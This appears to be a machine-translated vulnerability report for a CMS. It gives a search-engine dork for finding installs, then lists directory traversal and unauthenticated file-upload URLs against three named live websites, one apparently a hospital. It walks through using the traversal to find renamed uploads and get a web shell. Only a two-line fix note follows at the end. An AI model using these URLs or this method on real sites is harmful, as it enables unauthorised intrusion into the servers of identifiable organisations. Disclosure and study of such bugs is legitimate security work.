Worry-free: storage-type xss + getshell
Baidu keyword inurl: info. aspx? Code =
Arbitrary Directory Traversal
Http://www.312000.net/admin/dialog/FileList.aspx? Code = 0 & show = true & path =./Admin
Http://www.dyhospital.com/admin/dialog/FileList.aspx? Code = 0 & show = true & path = ./
Http://www.wlsph.com/admin/dialog/FileList.aspx? Code = 0 & show = true & path =./Admin/Dialog
Search for available upload points based on the previous Directory Traversal Vulnerability
Boring directory turning ······
Finally, find the uploaded file/admin/dialog/fileupload. aspx.
It seems that the default upload path is not executed.
Let's construct it.
Http://www.312000.net/admin/dialog/fileupload.aspx? Type = 1 & path =./Admin/Dialog
Http://www.dyhospital.com/admin/dialog/fileupload.aspx? Type = 1 & path =./Admin/Dialog
Http://www.wlsph.com/admin/dialog/fileupload.aspx? Type = 1 & path =./Admin/Dialog
What should I do if the uploaded file is renamed?
The previous directory traversal came in handy.
Use http://www.312000.net/as an example
In http://www.312000.net/admin/dialog/FileList.aspx? Code = 0 & show = true & path =./Admin/Dialog find the file (the browser needs to disable js scripts)
Visit
Http://www.312000.net/Admin/Dialog/201407301026743.txt
Solution:
Directory restrictions
Upload File whitelist